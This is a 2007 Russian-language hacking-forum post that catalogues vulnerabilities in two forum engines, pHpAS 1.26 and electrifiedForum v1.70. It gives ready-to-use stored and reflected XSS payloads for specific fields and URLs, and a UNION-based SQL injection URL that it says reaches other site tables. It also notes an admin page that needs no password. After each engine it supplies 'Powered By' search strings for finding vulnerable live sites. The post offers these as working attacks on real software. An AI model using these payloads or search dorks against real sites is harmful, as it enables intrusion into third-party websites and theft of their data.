[Обзор уязвимостей в форумных движках]

#39

23.04.2007, 15:31

Grey

Познавший АНТИЧАТ

Регистрация: 10.06.2006

Сообщений: 1,113

С нами: 10483586

Репутация: 5826

Форум: pHpAS
Версия: 1.26

1. Активная XSS.

1) При ответе в теме в поля Title и Name вставляем скрипт <script>alert();</script>.

Скрипт будет выполняться при про смотре коментариев.

2) При создание темы (/admin - пароль здесь не нужен) в полях Title и Text вводим <script>alert();</script>.

Скрипт будет выполнятся как на странице admin/index.php так и на /index.php.

2. SQL инъекция.

Уязвимость в сценарие show.php в параемтре id.

Код:

http://site.ru/forum/show.php?id=-1+union+select+1,2,3,4/*

Не смотря на то, что на форуме нет пользователей, сама sql инъекция даёт возможность обращаться к другим таблицам (к примеру к таблицам, используемым движком сайта).

------------------------------------------------------------

Для поиска сайтов с таким форумом вводим: Powered By: pHpAS 1.26

------------------------------------------------------------
------------------------------------------------------------

Форум: electrifiedForum
Версия: v1.70

1. Пасивная XSS.

Код:

http://site.ru/forum/index.php?action=displaythread&forum=chat&id=<script>alert();</script>

Есть еще одна но, она будет выполняться только с админскими привилегиями:

Код:

http://site.ru/forum/index.php?action=userinfo&user=<script>alert();</script>

2. Активная XSS.

1) В личке в поле Subject пишем <script>alert();</script>, скрипт будет выполняться при просмотре личной почты.

2) В профиле в подписе (Signature) пишем <script>alert();</script>, скрипт будет выполняться при просмотре сообщений на форуме.

3) На форуме при создание темы в поле Title пишем <script>alert();</script>, скрипт будет выполняться при ответе на сообщение.

------------------------------------------------------------

Для поиска сайтов с таким форумом вводим: Powered By electrifiedForum v1.70

Последний раз редактировалось Grey; 23.04.2007 в 18:24..